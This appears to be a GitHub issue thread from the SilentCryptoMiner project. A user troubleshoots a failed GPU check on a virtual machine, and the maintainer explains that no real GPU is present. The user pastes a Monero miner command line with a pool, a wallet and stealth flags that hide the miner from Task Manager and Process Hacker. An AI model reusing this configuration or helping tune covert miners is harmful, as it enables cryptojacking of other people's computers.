### ISSUE TITLE
Please help!!! checker

### ISSUE THREAD

**Issue by Alex0779** [UnamSanctam/SilentCryptoMiner#1190]
Hello , how do i fix this ?? i tried running my miner checker and i got this message 

Watchdog Running: Yes
Miners:
GPUs:
 VMware SVGA 3D
Compatible GPU found: False

what could be wrong ?? please help thank you

**Comment by Alex0779** [comment]
i tried mining monero with hashvault pool 

Watchdog Running: Yes
Miners:
--algo=rx/0  --url=pool.hashvault.pro:3333 --user="89C6aWzaruifPHn99pyXiU7XSU6Nrf7quhDKqbdyseueKy6YprGgGUxUgyRJ9ryRiN3282FPxRKkYFxqh2zsjAztEPM5o5e{COMPUTERNAME}" --pass="x" --cpu-max-threads-hint=20 --cinit-stealth-targets="Taskmgr.exe,ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe" --cinit-version="3.0.2" --tls --cinit-idle-wait=5 --cinit-idle-cpu=80 --cinit-id="lpoocewegjrpeqyx"
GPUs:
 VMware SVGA 3D
Compatible GPU found: False

soon as i click my checker i get this

**Comment by Alex0779** [comment]
why do i get compatible GPU found: false

**Comment by UnamSanctam** [comment]
Because you don't have a real GPU, you're on a VM.

**Comment by UnamSanctam** [comment]
You mean mine with the GPU on a VM? Then no since you can't mine with a GPU if you don't have a GPU (obviously), you would need a GPU passthrough VM but there aren't any for Windows I believe.

**Comment by UnamSanctam** [comment]
Because you don't have a dedicated GPU, you only have integrated graphics on your CPU.
